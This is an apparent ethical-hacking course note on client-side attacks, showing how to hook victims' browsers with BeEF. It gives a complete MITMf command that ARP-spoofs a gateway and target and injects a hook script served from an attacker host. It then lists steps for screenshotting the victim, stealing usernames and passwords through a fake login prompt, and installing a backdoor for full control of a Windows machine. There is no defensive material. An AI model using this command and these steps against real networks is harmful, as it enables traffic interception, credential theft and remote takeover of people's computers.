Ethical Hacking - GAINING ACCESS(23)

CLIENT SIDE ATTACK - BeEF Framework

Hooking targets using MITMF

Tools: MITMF and BeEF

Start BeEF and execute the following commands:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hooks

Open any website in the browser on the target machine. You can find injected codes on the source page.

 

 Open BeEF control panels and find the victim online browsers.

 Then you can execute the commands to exploit victimized machines.

1. Get screenshots through Spyder Eys.

 2. Get account name and password through Pretty Theft.

 

 

 If a victim fills in the prompted login form, you can get username and password.

 

 3. Gaining full control over Windows Target

 

Download and install the backdoor file on the target machine, then you can control this computer.